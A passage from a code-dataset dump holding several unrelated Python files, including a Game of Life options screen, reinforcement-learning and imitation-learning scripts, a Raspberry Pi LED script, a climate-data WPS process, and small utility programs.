int(event.keysym)\r\n                data.error = False\r\n            except:\r\n                data.error = True\r\n    elif data.highlight == 3:\r\n        if event.keysym == \"BackSpace\":\r\n            data.gridSize = data.gridSize // 10\r\n        else:\r\n            try:\r\n                data.gridSize = (data.gridSize*10) + int(event.keysym)\r\n                data.error = False\r\n            except:\r\n                data.error = True\r\n    elif data.highlight == 4:\r\n        if event.keysym == \"BackSpace\":\r\n            data.itrDelay = data.itrDelay // 10\r\n        else:\r\n            try:\r\n                data.itrDelay = (data.itrDelay*10) + int(event.keysym)\r\n                data.error = False\r\n            except:\r\n                data.error = True\r\n    if event.keysym == \"Return\" and data.fin == False:\r\n        data.fin = True\r\n    elif event.keysym == \"Return\" and data.fin:\r\n        if len(inSeeds) == 1:\r\n            import GOL_playStage3\r\n            root.destroy()\r\n            GOL_playStage3.runStage(inSeeds[0], data.liveOption, data.spawnOption,\r\n                                    data.gridSize, data.itrDelay/1000.0)\r\n        elif len(inSeeds) == 2:\r\n            import GOL_playStageMulti3\r\n\r\n            root.destroy()\r\n\r\n            GOL_playStageMulti3.runStage(inSeeds[0], inSeeds[1], data.liveOption, data.spawnOption,\r\n                                         data.gridSize, data.itrDelay/1000.0)\r\n    elif event.keysym == \"BackSpace\" and data.fin:\r\n        data.fin = False\r\n\r\ndef drawText(canvas, data):\r\n    center = data.width/2\r\n    centerLeft = data.width/8\r\n    row = data.height/5\r\n    rowCount = 1\r\n    canvas.create_text(center, rowCount * row,\r\n                       text = \"Game Of Life Options:\",\r\n                       font = data.titleFont)\r\n    rowCount += 0.5\r\n    canvas.create_text(center, rowCount * row,\r\n                       text = \"Changing these parameters will change\\nthe behavior of the game. 
Experiment!\",\r\n font = data.infoFont)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount * row,\r\n text = \"Press \\'Enter\\' to Continue\",\r\n font = data.infoFont)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"# live neighbors to survive (default 2):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"# live neighbors to spawn cell (default 3):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"Grid Size (default 5):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.25\r\n canvas.create_text(centerLeft, rowCount * row,\r\n text = \"Time per iteration (default 250 ms):\",\r\n font = data.infoFont,\r\n anchor = W)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount * row,\r\n text = \"(If # live neighbors != either option, cell dies)\",\r\n font = data.infoFont)\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount*row,\r\n text = \"A cool one to try is 27 and 2. \\n (27 neighbors will never happen)\")\r\n rowCount += 0.5\r\n canvas.create_text(center, rowCount*row,\r\n text = \"27/2 is called the Exploding character\")\r\n rowCount += 0.25\r\n canvas.create_text(center, rowCount*row,\r\n text = \"(http://psoup.math.wisc.edu/mcell/rullex_life.html)\")\r\n if data.error:\r\n rowCount += 0.25\r\n canvas.create_text(center, rowCount * row,\r\n text = \"PLEASE ENTER VALID INTEGER\",\r\n font = data.infoFont,\r\n anchor = S)\r\n\r\ndef drawBoxes(canvas, data):\r\n if data.highlight == 0:\r\n color1, color2, color3, color4 = 'White', 'White','White','White'\r\n elif data.highlight == 1:\r\n color1, color2, color3, color4 = 'Yellow', 'White','White','White'\r\n elif data.highlight == 2:\r\n color1, color2, color3, color4 = 'White', 'Yellow','White','White'\r\n elif data.highlight == 3:\r\n color1, color2, color3, color4 = 'White', 'White','Yellow','White'\r\n elif data.highlight == 4:\r\n color1, color2, color3, color4 = 'White', 'White','White','Yellow'\r\n\r\n canvas.create_rectangle(data.box1X, data.box1Y,\r\n data.box1X + data.boxSize,\r\n data.box1Y + data.boxSize,\r\n fill = color1)\r\n canvas.create_rectangle(data.box2X, data.box2Y,\r\n data.box2X + data.boxSize,\r\n data.box2Y + data.boxSize,\r\n fill = color2)\r\n canvas.create_rectangle(data.box3X, data.box3Y,\r\n data.box3X + data.boxSize,\r\n data.box3Y + data.boxSize,\r\n fill = color3)\r\n canvas.create_rectangle(data.box4X, data.box4Y,\r\n data.box4X + data.boxSize,\r\n data.box4Y + data.boxSize,\r\n fill = color4)\r\n canvas.create_text(data.box1X + 0.5*data.boxSize,\r\n data.box1Y + 0.5*data.boxSize,\r\n text=str(data.liveOption))\r\n canvas.create_text(data.box2X + 0.5*data.boxSize,\r\n data.box2Y + 0.5*data.boxSize,\r\n text=str(data.spawnOption))\r\n canvas.create_text(data.box3X + 0.5*data.boxSize,\r\n data.box3Y + 0.5*data.boxSize,\r\n text=str(data.gridSize))\r\n canvas.create_text(data.box4X + 0.5*data.boxSize,\r\n data.box4Y + 0.5*data.boxSize,\r\n text=str(data.itrDelay))\r\n\r\ndef redrawAll(canvas, data): #draws two 5x5 grids\r\n # draw in canvas\r\n drawText(canvas, data)\r\n drawBoxes(canvas, data)\r\n if data.fin:\r\n canvas.create_rectangle(data.width/4,data.height/3,\r\n data.width*3/4,data.height*2/3,\r\n fill = 'white')\r\n canvas.create_text(data.width/2, data.height/2,\r\n text = \"\\'Enter\\' to confirm, \\n\\'Delete\\' to abort\")\r\n 
pass\r\n\r\n####################################\r\n# use the run function as-is\r\n####################################\r\n\r\n\"\"\"\r\nStart of Citation...\r\nNOT ORIGINAL CODE:\r\nTaken from CMU 15112 Animation Starter Code\r\n\"\"\"\r\n\r\nroot = Tk()\r\n\r\ndef run(width=500, height=500):\r\n def redrawAllWrapper(canvas, data):\r\n canvas.delete(ALL)\r\n canvas.create_rectangle(0, 0, data.width, data.height,\r\n fill='white', width=0)\r\n redrawAll(canvas, data)\r\n canvas.update()\r\n\r\n def mousePressedWrapper(event, canvas, data):\r\n mousePressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def keyPressedWrapper(event, canvas, data):\r\n keyPressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n # Set up data and call init\r\n class Struct(object): pass\r\n data = Struct()\r\n data.width = width\r\n data.height = height\r\n\r\n root.resizable(width=False, height=False) # prevents resizing window\r\n init(data)\r\n # create the root and the canvas\r\n canvas = Canvas(root, width=data.width, height=data.height)\r\n canvas.configure(bd=0, highlightthickness=0)\r\n canvas.pack()\r\n # set up events\r\n root.bind(\"<Button-1>\", lambda event:\r\n mousePressedWrapper(event, canvas, data))\r\n root.bind(\"<Key>\", lambda event:\r\n keyPressedWrapper(event, canvas, data))\r\n redrawAll(canvas, data)\r\n # and launch the app\r\n root.mainloop() # blocks until window is closed\r\n print(\"bye!\")\r\n\r\n\"\"\"\r\nEnd of Citation...\r\nTaken from CMU 15112 Animation Starter Code\r\n\"\"\"\r\n\r\n#run(500,500)\r\n","sub_path":"GOL_options3.py","file_name":"GOL_options3.py","file_ext":"py","file_size_in_byte":10356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639896359","text":"import numpy as np\nimport gym\nimport random\n\nfrom collections import deque\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom random import randint\n\n\n\nmemory = deque(maxlen=2000)\n\nenv = gym.make('MountainCar-v0')\n\nmodel = Sequential()\nmodel.add(Dense(24, input_dim=2, activation='relu'))\nmodel.add(Dense(24, activation='relu'))\nmodel.add(Dense(3, activation='linear'))\nmodel.compile(loss='mse', optimizer=Adam(lr=0.001))\n\n\nmodel2 = Sequential()\nmodel2.add(Dense(24, input_dim=2, activation='relu'))\nmodel2.add(Dense(24, activation='relu'))\nmodel2.add(Dense(3, activation='linear'))\nmodel2.compile(loss='mse', optimizer=Adam(lr=0.001))\n\nfor i in range(100000) :\n state = env.reset()\n done = False\n score = 0\n while not done :\n #calc action\n if i < 1005 and 1000<i : env.render()\n if i < 2005 and 2000<i : env.render()\n if i < 3005 and 3000<i : env.render()\n if i < 4005 and 4000<i : env.render()\n if i < 5005 and 5000<i : env.render()\n if i < 6005 and 6000<i : env.render()\n if i < 7005 and 7000<i : env.render()\n if i < 8005 and 8000<i : env.render()\n if i < 9005 and 9000<i : env.render()\n if i < 10005 and 10000<i : env.render()\n if i < 11005 and 11000<i : env.render()\n if i < 12005 and 12000<i : env.render()\n if i < 13005 and 13000<i : env.render()\n if i < 14005 and 14000<i : env.render()\n if i < 15005 and 15000<i : env.render()\n #if i > 500 : env.render()\n action = 1\n AB = randint(0, 9)\n if np.random.rand() <= 0.01 : action = random.randrange(3)\n else : action = np.argmax(model.predict(np.array(state).reshape(1,2))[0])\n next_state, reward, done, _ = env.step(action)\n suret = next_state[1]\n pos = next_state[0]\n suret = (suret - (-0.07)) / 
(0.07- (-0.07)) - 0.5+0.1\n    # pos = (pos - (-1.2)) / (0.6- (-1.2))\n\n        reward = abs(suret)\n\n        memory.append((state, action, next_state, reward, done))\n\n        state = next_state\n        score = score + reward\n    print(i, ' Score', score)\n\n    # Replay: train on a random minibatch drawn from memory\n    if len(memory) < 32:\n        continue\n    # sample 32 transitions from the replay memory (translated from Turkish)\n    sample = random.sample(memory, 32)\n    for state, action, next_state, reward, done in sample :\n        next_state = np.array(next_state).reshape(1,2)\n        state = np.array(state).reshape(1,2)\n        ra = randint(0,1)\n        if ra == 0 :\n            if not done : target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n            else : target = -1\n            #print(model.predict(next_state)[0]) ``\n            target_f = model.predict(state)\n            target_f[0][action] = target\n            model.fit(state, target_f, epochs=1,verbose=0)\n        else :\n            if not done : target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n            else : target = -1\n            #print(model.predict(next_state)[0]) ``\n            target_f = model.predict(state)\n            target_f[0][action] = target\n            model.fit(state, target_f, epochs=1,verbose=0)\n    # bootstrap a target from the predicted future value (translated from Turkish)\n    #target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n    if not done : target = reward + 0.95 * np.amax(model.predict(next_state)[0])\n    else : target = -1\n    #print(model.predict(next_state)[0]) ``\n    target_f = model.predict(state)\n    target_f[0][action] = target\n    model.fit(state, target_f, epochs=1,verbose=0)\n","sub_path":"mountaincar1.py","file_name":"mountaincar1.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"597636165","text":"import tensorflow as tf\nimport numpy as np\n\nimport itertools\nimport better_exceptions\nimport gym\nfrom gym import wrappers\nfrom tqdm import tqdm\n\nimport tf_util\nimport load_policy\n\nslim = tf.contrib.slim\n\nBATCH_SIZE = 32\nLEARNING_RATE = 0.001\nBETA = 0.9\n\nclass Policy():\n\n\tdef __init__(self, env, obs_samples=None):\n\n\t\tif obs_samples is None:\n\t\t\tobs_samples = np.array([env.observation_space.sample() for _ in range(1000)])\n\n\t\tself.obs_mean = obs_samples.mean(axis=0)\n\t\tself.obs_std = obs_samples.std(axis=0)\n\n\t\tself.state = tf.placeholder(tf.float32, [None] + list(env.observation_space.shape))\n\t\tself.target_action = tf.placeholder(tf.float32, [None] + list(env.action_space.shape))\n\n\t\tnormalized = (self.state - self.obs_mean) / self.obs_std\n\n\t\tnet = slim.fully_connected(normalized, 50, \n\t\t\t\t\t\t\t\t   scope='fc1', activation_fn=tf.nn.relu)\n\t\tnet = slim.fully_connected(net, 50, \n\t\t\t\t\t\t\t\t   scope='fc2', activation_fn=tf.nn.relu)\n\t\tself.policy = slim.fully_connected(net, env.action_space.shape[0], \n\t\t\t\t\t\t\t\t\t\t   scope='policy', activation_fn=None)\n\n\t\t# L2-loss\n\t\tself.loss = tf.reduce_mean(tf.reduce_sum((self.policy-self.target_action)**2, axis=1))\n\n\t\toptimizer = tf.train.AdamOptimizer(LEARNING_RATE, beta1=BETA)\n\n\t\tself.train_op = optimizer.minimize(self.loss)\n\n\tdef predict(self, state):\n\t\tsess = tf.get_default_session()\n\t\treturn sess.run(self.policy, feed_dict={self.state: state})\n\n\tdef update(self, state, action):\n\t\tsess = tf.get_default_session()\n\t\tloss, _ = sess.run([self.loss, self.train_op], feed_dict={self.state: state, self.target_action: action})\n\t\treturn loss\n\n\tdef test_run(self, env, max_steps):\n\t\tobservations = []\n\t\tactions = []\n\t\trewards = 0.\n\n\t\tstate = env.reset()\n\n\t\tfor step in 
itertools.count():\n\t\t\tobservations.append(state)\n\t\t\tactions.append(self.predict(np.expand_dims(state, axis=0))[0])\n\n\t\t\tnext_state, reward, done, _ = env.step(actions[-1])\n\n\t\t\tstate = next_state\n\t\t\trewards += reward\n\n\t\t\tif step >= max_steps or done:\n\t\t\t\tbreak\n\n\t\texperience = {'observations': np.stack(observations, axis=0),\n\t\t\t\t\t 'actions': np.squeeze(np.stack(actions, axis=0)),\n\t\t\t\t\t 'reward': rewards}\n\n\t\treturn experience\n\n\ndef gather_expert_experience(num_rollouts, \n\t\t\t\t\t\t\t env, \n\t\t\t\t\t\t\t policy_fn, \n\t\t\t\t\t\t\t max_steps):\n\n\twith tf.Session():\n\t\ttf_util.initialize()\n\n\t\treturns = []\n\t\tobservations = []\n\t\tactions = []\n\n\t\tfor i in tqdm(range(num_rollouts)):\n\t\t\tstate = env.reset()\n\t\t\tdone = False\n\t\t\trewards = 0.\n\t\t\tsteps = 0\n\n\t\t\twhile not done:\n\t\t\t\taction = policy_fn(state[None,:])\n\t\t\t\tobservations.append(state)\n\t\t\t\tactions.append(action)\n\n\t\t\t\tnext_state, reward, done, _ = env.step(action)\n\n\t\t\t\tstate = next_state\n\t\t\t\trewards += reward\n\t\t\t\tsteps += 1\n\n\t\t\t\tif steps >= max_steps:\n\t\t\t\t\tbreak\n\n\t\t\treturns.append(rewards)\n\n\t\texpert_data = {'observations': np.stack(observations, axis=0),\n\t\t\t\t\t 'actions': np.squeeze(np.stack(actions, axis=0)),\n\t\t\t\t\t 'returns': np.array(returns)}\n\n\t\treturn expert_data\n\n\ndef behavior_cloning(env_name=None,\n\t\t\t\t\t expert_policy_file=None,\n\t\t\t\t\t num_rollouts=10,\n\t\t\t\t\t max_timesteps=None,\n\t\t\t\t\t num_epochs=100,\n\t\t\t\t\t save=None):\n\t\n\ttf.reset_default_graph()\n\n\tenv = gym.make(env_name)\n\tmax_steps = max_timesteps or env.spec.timestep_limit\n\n\tprint('[BA] Loading and building expert policy')\n\texpert_policy_fn = load_policy.load_policy(expert_policy_file)\n\n\tprint('[BA] Gather experience...')\n\tdata = gather_expert_experience(num_rollouts, env, expert_policy_fn, max_steps)\n\n\tprint('[BA] Expert\\'s reward mean: {:4f}({:4f})'.format(np.mean(data['returns']), np.std(data['returns'])))\n\n\tprint('[BA] Building cloning policy')\n\tpolicy = Policy(env, data['observations'])\n\n\twith tf.Session():\n\t\ttf_util.initialize()\n\n\t\tfor epoch in tqdm(range(num_epochs)):\n\t\t\tnum_samples = data['observations'].shape[0]\n\t\t\tperm = np.random.permutation(num_samples)\n\n\t\t\tobs_samples = data['observations'][perm]\n\t\t\taction_samples = data['actions'][perm]\n\n\t\t\tloss = 0.\n\t\t\tfor k in range(0, obs_samples.shape[0], BATCH_SIZE):\n\t\t\t\tloss += policy.update(obs_samples[k:k+BATCH_SIZE], action_samples[k:k+BATCH_SIZE])\n\n\t\t\tnew_exp = policy.test_run(env, max_steps)\n\t\t\ttqdm.write('[BA] Epoch {:3d}, Loss {:4f}, Reward {:4f}'.format(epoch, loss/num_samples, new_exp['reward']))\n\n\t\tif save is not None:\n\t\t\tenv = wrappers.Monitor(env, save, force=True)\n\n\t\tresults = []\n\t\tfor _ in tqdm(range(num_rollouts)):\n\t\t\tresults.append(policy.test_run(env, max_steps)['reward'])\n\n\t\tprint('[BA] Reward mean & std of cloned policy: {:4f}({:4f})'.format(np.mean(results), np.std(results)))\n\n\treturn np.mean(data['returns']), np.std(data['returns']), np.mean(results), np.std(results)\n\n\ndef dagger(env_name=None,\n\t\t expert_policy_file=None,\n\t\t num_rollouts=10,\n\t\t max_timesteps=None,\n\t\t num_epochs=100,\n\t\t save=None):\n\t\n\ttf.reset_default_graph()\n\n\tenv = gym.make(env_name)\n\tmax_steps = max_timesteps or env.spec.timestep_limit\n\n\tprint('[DA] Loading and building expert policy')\n\texpert_policy_fn = 
load_policy.load_policy(expert_policy_file)\n\n\tprint('[DA] Gather experience...')\n\tdata = gather_expert_experience(num_rollouts, env, expert_policy_fn, max_steps)\n\n\tprint('[DA] Expert\\'s reward mean: {:4f}({:4f})'.format(np.mean(data['returns']), np.std(data['returns'])))\n\n\tprint('[DA] Building cloning policy')\n\tpolicy = Policy(env, data['observations'])\n\n\twith tf.Session():\n\t\ttf_util.initialize()\n\n\t\tfor epoch in tqdm(range(num_epochs)):\n\t\t\tnum_samples = data['observations'].shape[0]\n\t\t\tperm = np.random.permutation(num_samples)\n\n\t\t\tobs_samples = data['observations'][perm]\n\t\t\taction_samples = data['actions'][perm]\n\n\t\t\tloss = 0.\n\n\t\t\tfor k in range(0, obs_samples.shape[0], BATCH_SIZE):\n\t\t\t\tloss += policy.update(obs_samples[k:k+BATCH_SIZE], action_samples[k:k+BATCH_SIZE])\n\n\t\t\tnew_exp = policy.test_run(env, max_steps)\n\n\t\t\t# Data aggregation steps\n\t\t\t# Supervision signal comes from expert policy\n\t\t\tnew_exp_len = new_exp['observations'].shape[0]\n\n\t\t\texpert_expected_actions = []\n\n\t\t\tfor k in range(0, new_exp_len, BATCH_SIZE):\n\t\t\t\texpert_expected_actions.append(expert_policy_fn(new_exp['observations'][k:k+BATCH_SIZE]))\n\n\t\t\t# Added new experience into original one\n\t\t\tdata['observations'] = np.concatenate((data['observations'], new_exp['observations']), axis=0)\n\t\t\tdata['actions'] = np.concatenate([data['actions']] + expert_expected_actions, axis=0)\n\t\t\ttqdm.write('[DA] Epoch {:3d}, Loss {:4f}, Reward {:4f}'.format(epoch, loss/num_samples, new_exp['reward']))\n\n\t\tif save is not None:\n\t\t\tenv = wrappers.Monitor(env, save, force=True)\n\n\t\tresults = []\n\t\tfor _ in tqdm(range(num_rollouts)):\n\t\t\tresults.append(policy.test_run(env, max_steps)['reward'])\n\t\tprint('[DA] Reward mean & std of cloned policy with DAGGER: {:4f}({:4f})'.format(np.mean(results), np.std(results)))\n\n\treturn np.mean(data['returns']), np.std(data['returns']), np.mean(results), np.std(results)\n\n\nif __name__ == \"__main__\":\n\n import os\n env_models = [('Ant-v1','experts/Ant-v1.pkl'),\n ('HalfCheetah-v1','experts/HalfCheetah-v1.pkl'),\n ('Hopper-v1','experts/Hopper-v1.pkl'),\n ('Humanoid-v1','experts/Humanoid-v1.pkl'),\n ('Reacher-v1','experts/Reacher-v1.pkl'),\n ('Walker2d-v1','experts/Walker2d-v1.pkl'),]\n\n results = []\n\n for env, model in env_models :\n\n ex_mean, ex_std, bc_mean, bc_std = behavior_cloning(env_name=env,\n expert_policy_file=model,\n save=os.path.join(os.getcwd(), env, 'bc'))\n\n _, _, da_mean, da_std = dagger(env_name=env,\n \t\t expert_policy_file=model,\n \t num_epochs=40,\n \t save=os.path.join(os.getcwd(), env, 'da'))\n\n results.append((env, ex_mean, ex_std,\n \t\t\t bc_mean, bc_std,\n \t\t\t da_mean, da_std))\n\n for env_name, ex_mean, ex_std, bc_mean, bc_std, da_mean, da_std in results :\n print('Env: {}, Expert: {:4f}({:4f}), Behavior Cloning: {:4f}({:4f}), Dagger: {:4f}({:4f})'.format(env_name, ex_mean, ex_std, bc_mean, bc_std, da_mean, da_std))\n ","sub_path":"sp17_hw/hw1/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27642837","text":"from gpiozero import LED,Button\nfrom signal import pause\nimport time\n\nled = LED(18)\nbutton = Button(2)\n\nbutton.when_pressed = led.on\ntime.sleep(5)\nbutton = 
button  # fix: keep the Button bound (the original line read `button = led.off()`, which rebound `button` to None)\nled.off()\ntime.sleep(5)\n\npause()\n","sub_path":"LEDButton.py","file_name":"LEDButton.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515691651","text":"import logging\nimport os\n\nfrom pywps import FORMATS, ComplexInput, ComplexOutput, Format, LiteralInput, LiteralOutput, Process\nfrom pywps.inout.literaltypes import make_allowedvalues\nfrom pywps.app.Common import Metadata\nfrom pywps.response.status import WPS_STATUS\n\nfrom copernicus import runner, util\nfrom copernicus.processes.utils import default_outputs, model_experiment_ensemble\n\nLOGGER = logging.getLogger(\"PYWPS\")\n\n\nclass PreprocessExample(Process):\n    def __init__(self):\n        inputs = [\n            *model_experiment_ensemble(\n                models=['EC-EARTH'],\n                model_name='model1',\n                experiments=['historical'],\n                ensembles=['r2i1p1'],\n                ensemble_name='ensemble1',\n                start_end_year=(1850, 2005),\n                start_end_defaults=(2000, 2005)\n            ),\n            *model_experiment_ensemble(\n                models=['bcc-csm1-1'],\n                model_name='model2',\n                experiments=['historical'],\n                ensembles=['r1i1p1'],\n                ensemble_name='ensemble2',\n                start_end_year=(1850, 2005),\n                start_end_defaults=(2000, 2005)\n            ),\n            *model_experiment_ensemble(\n                models=['MPI-ESM-LR'],\n                model_name='model3',\n                experiments=['historical'],\n                ensembles=['r1i1p1'],\n                ensemble_name='ensemble3',\n                start_end_year=(1850, 2005),\n                start_end_defaults=(2000, 2005)\n            ),\n            LiteralInput('extract_levels', 'Extraction levels',\n                         abstract='Choose an extraction level for the preprocessor.',\n                         data_type='float',\n                         #allowed_values=make_allowedvalues([0.0, 110000.0]),\n                         default=85000.0),\n        ]\n        outputs = [\n            ComplexOutput('plot', 'Output plot',\n                          abstract='Generated output plot of ESMValTool processing.',\n                          as_reference=True,\n                          supported_formats=[Format('image/png')]),\n            ComplexOutput('data', 'Data',\n                          abstract='Generated output data of ESMValTool processing.',\n                          as_reference=True,\n                          supported_formats=[FORMATS.NETCDF]),\n            ComplexOutput('archive', 'Archive',\n                          abstract='The complete output of the ESMValTool processing as an zip archive.',\n                          as_reference=True,\n                          supported_formats=[Format('application/zip')]),\n            *default_outputs(),\n        ]\n\n        super(PreprocessExample, self).__init__(\n            self._handler,\n            identifier=\"preproc\",\n            title=\"Preprocessing Demo\",\n            version=runner.VERSION,\n            abstract=\"Generates a plot for temperature using ESMValTool.\",\n#                     \" The default run uses the following CMIP5 data:\"\n#                     \" project=CMIP5, experiment=historical, ensemble=r1i1p1, variable=ta, model=MPI-ESM-LR, time_frequency=mon.\", # noqa\n            metadata=[\n                Metadata('Estimated Calculation Time', '1 Minute'),\n                Metadata('ESMValTool', 'http://www.esmvaltool.org/'),\n#                Metadata('Documentation',\n#                         'https://copernicus-wps-demo.readthedocs.io/en/latest/processes.html#pydemo',\n#                         role=util.WPS_ROLE_DOC),\n#                Metadata('Media',\n#                         util.diagdata_url() + '/pydemo/pydemo_thumbnail.png',\n#                         role=util.WPS_ROLE_MEDIA)\n            ],\n            inputs=inputs,\n            outputs=outputs,\n            status_supported=True,\n            store_supported=True)\n\n    def _handler(self, request, response):\n        response.update_status(\"starting ...\", 0)\n        workdir = self.workdir\n\n        # build esgf search constraints\n        constraints = dict(\n            model1=request.inputs['model1'][0].data,\n            ensemble1=request.inputs['ensemble1'][0].data,\n            model2=request.inputs['model2'][0].data,\n            ensemble2=request.inputs['ensemble2'][0].data,\n            model3=request.inputs['model3'][0].data,\n            ensemble3=request.inputs['ensemble3'][0].data,\n            
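# note (added; not in the original): 'experiment', 'start_year' and 'end_year' are shared inputs, presumably created by the model_experiment_ensemble helper above\n            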
experiment=request.inputs['experiment'][0].data,\n        )\n\n        options = dict(\n            extract_levels=request.inputs['extract_levels'][0].data\n        )\n\n        # generate recipe\n        response.update_status(\"generate recipe ...\", 10)\n        recipe_file, config_file = runner.generate_recipe(\n            workdir=workdir,\n            diag='preproc',\n            constraints=constraints,\n            start_year=request.inputs['start_year'][0].data,\n            end_year=request.inputs['end_year'][0].data,\n            output_format='png',\n            options=options\n        )\n\n        # recipe output\n        response.outputs['recipe'].output_format = FORMATS.TEXT\n        response.outputs['recipe'].file = recipe_file\n\n        # run diag\n        response.update_status(\"running diagnostic ...\", 20)\n        result = runner.run(recipe_file, config_file)\n\n        response.outputs['success'].data = result['success']\n\n        # log output\n        response.outputs['log'].output_format = FORMATS.TEXT\n        response.outputs['log'].file = result['logfile']\n\n        # debug log output\n        response.outputs['debug_log'].output_format = FORMATS.TEXT\n        response.outputs['debug_log'].file = result['debug_logfile']\n\n        if result['success']:\n            try:\n                self.get_outputs(result, response)\n            except Exception as e:\n                response.update_status(\"exception occurred: \" + str(e), 85)\n        else:\n            LOGGER.exception('esmvaltool failed!')\n            response.update_status(\"exception occurred: \" + result['exception'], 85)\n\n        response.update_status(\"creating archive of diagnostic result ...\", 90)\n\n        response.outputs['archive'].output_format = Format('application/zip')\n        response.outputs['archive'].file = runner.compress_output(os.path.join(workdir, 'output'), 'diagnostic_result.zip')\n\n        response.update_status(\"done.\", 100)\n        return response\n\n    def get_outputs(self, result, response):\n        # result plot\n        response.update_status(\"collecting output ...\", 80)\n        response.outputs['plot'].output_format = Format('application/png')\n        response.outputs['plot'].file = runner.get_output(\n            result['plot_dir'],\n            path_filter=os.path.join('diagnostic1', 'script1'),\n            name_filter=\"CMIP5*\",\n            output_format=\"png\")\n\n        response.outputs['data'].output_format = FORMATS.NETCDF\n        response.outputs['data'].file = runner.get_output(\n            result['plot_dir'],\n            path_filter=os.path.join('diagnostic1', 'script1'),\n            name_filter=\"CMIP5*\",\n            output_format=\"nc\")\n","sub_path":"copernicus/processes/wps_preproc_example.py","file_name":"wps_preproc_example.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269379640","text":"import re\nfrom collections import Counter\n\n\ndef load_data(filepath):\n    with open(filepath, 'r') as data:\n        return data.read()\n\n\ndef get_most_frequent_words(text, number_of_words_to_output):\n    words = get_all_words(text)\n    counter_words = Counter(words)\n    list_of_common_words = \\\n        counter_words.most_common(number_of_words_to_output)\n    return list_of_common_words\n\n\ndef get_all_words(text):\n    words = re.findall(r'[^\\W|\\d]+', text)\n    return words\n\n\nif __name__ == '__main__':\n    number_of_output_words = 10\n    filepath = input('Name of the file:')\n    text_from_file = load_data(filepath)\n    text_from_file = text_from_file.lower()  # fix: str.lower() returns a new string; the original call discarded the result\n    list_of_common_words = get_most_frequent_words(text_from_file, \\\n                            number_of_output_words)\n    print('{} {}'.format(str(number_of_output_words), \\\n            'of the most common words: '))\n    for word in list_of_common_words:\n        
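# note (added; not in the original file): each element is a (word, count) tuple produced by Counter.most_common\n        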
print(word)","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"83174363","text":"primeiro = int(input('Enter the first term: '))\r\nrazao = int(input('Common difference of the AP: '))\r\ntermo = primeiro\r\nc = 1\r\nwhile c <= 10:\r\n    print(f'{termo} - ', end='')\r\n    termo += razao\r\n    c += 1\r\nprint('Done')\r\n\r\n","sub_path":"ex061 - Progressão aritimetica v2.0.py","file_name":"ex061 - Progressão aritimetica v2.0.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186588271","text":"# -*- coding: utf-8 -*-\n'''Base Class of PlotCanvas'''\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom PyQt5.QtWidgets import QSizePolicy\n\n\nclass PlotCanvas(FigureCanvas):\n    '''FigureCanvas Class'''\n\n    def __init__(self, parent=None, width=4.8, height=3, dpi=200):\n\n        self.fig = Figure(figsize=(width, height), dpi=dpi)\n        self.fig.subplots_adjust(left=0.2, right=0.95, bottom=0.16, top=0.95)\n        self.plot_canvas = self.fig.add_subplot(111)\n\n        FigureCanvas.__init__(self, self.fig)\n        self.setParent(parent)\n\n        FigureCanvas.setSizePolicy(self,\n                                   QSizePolicy.Expanding,\n                                   QSizePolicy.Expanding)\n        FigureCanvas.updateGeometry(self)\n\n        #Turn main and sub ticks inward\n        self.plot_canvas.tick_params(\n            which=\"major\", direction='in', labelleft=False)\n        self.plot_canvas.tick_params(\n            which=\"minor\", direction='in', labelleft=False)\n","sub_path":"base_func/base_plot.py","file_name":"base_plot.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303968267","text":"# --------------------------------------------------------\n#\n# PYTHON PROGRAM DEFINITION\n#\n# The knowledge a computer has of Python can be specified in 3 levels:\n#    (1) Prelude knowledge --> The computer has it by default.\n#    (2) Borrowed knowledge --> The computer gets this knowledge from 3rd party libraries defined by others\n#                               (but imported by us in this program).\n#    (3) Generated knowledge --> The computer gets this knowledge from the new functions defined by us in this program.\n#\n# When launching in a terminal the command:\n# user:~$ python3 this_file.py\n# our computer first processes this PYTHON PROGRAM DEFINITION section of the file.\n# On it, our computer enhances its Python knowledge from levels (2) and (3) with the imports and new functions\n# defined in the program. However, it still does not execute anything.\n#\n# --------------------------------------------------------\n\n# ------------------------------------------\n# IMPORTS\n# ------------------------------------------\nimport pyspark\nimport shutil\nimport os\n\n# ------------------------------------------\n# FUNCTION process_line\n# ------------------------------------------\ndef process_line(line):\n    # 1. We create the output variable\n    res = []\n\n    # 2. We set the line to be split by \" \"\n    line = line.replace(\"\\n\", \"\")\n    line = line.strip()\n    line = line.rstrip()\n    line = line.replace(\"\\t\", \" 